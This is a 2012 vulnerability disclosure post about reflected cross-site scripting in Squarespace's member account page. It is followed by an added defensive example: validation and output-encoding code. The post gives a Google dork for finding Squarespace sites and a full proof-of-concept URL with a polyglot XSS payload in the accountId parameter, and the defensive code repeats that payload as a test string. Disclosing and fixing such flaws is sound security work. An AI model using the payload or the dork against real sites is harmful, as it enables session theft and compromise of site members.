Sunday, 26 February 2012

Squarespace Cross Site Scripting

# Exploit Title: Squarespace Cross Site Scripting
# Date: 26.02.2012
# Author: Sony

# Software Link: http://www.squarespace.com/
# Google Dorks: powered by squarespace site:edu (or org or com or what you want)
# Web Browser : Mozilla Firefox

# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/squarespace-cross-site-scripting.html
..................................................................

What is Squarespace?

http://en.wikipedia.org/wiki/Squarespace
http://blog-software-review.toptenreviews.com/

We have XSS in Squarespace.

But we can see this only after "member login".

(other site)



(my site)

http://sonystyles.squarespace.com/display/configuration/CreateOrModifyMemberAccount?accountId=2095672%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
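
The PoC above places quote, comment and tag break-out characters in the `accountId` query parameter. As an added example (not from the original post and not Squarespace's code), this is one way a handler could reject that value and encode output per context. The function names and the assumption that account IDs are short decimal integers are hypothetical.

```javascript
// Added example, not Squarespace code. accountId value copied from the PoC URL above.
const POC_ACCOUNT_ID =
  String.raw`2095672%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//` +
  String.raw`%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//` +
  String.raw`--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E`;

// Assumption: account IDs are short decimal integers (the PoC value starts with 2095672).
function parseAccountId(rawQueryValue) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawQueryValue);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  return /^[0-9]{1,18}$/.test(decoded) ? decoded : null;
}

// Output encoding for HTML text and quoted attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Output encoding for a value placed inside a quoted JavaScript string literal
// in an inline <script>: every non-alphanumeric code unit becomes \uXXXX.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hypothetical render step: validate first, then still encode for each context.
function renderAccountField(rawQueryValue) {
  const id = parseAccountId(rawQueryValue);
  if (id === null) return { status: 400, body: "invalid accountId" };
  return {
    status: 200,
    body: `<input name="accountId" value="${escapeHtml(id)}">` +
          `<script>var accountId = '${escapeJsString(id)}';</script>`,
  };
}
```

Validation alone stops this PoC, but the two encoders matter for any field that cannot be restricted to digits, because the payload targets both a JavaScript string context and an HTML context.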
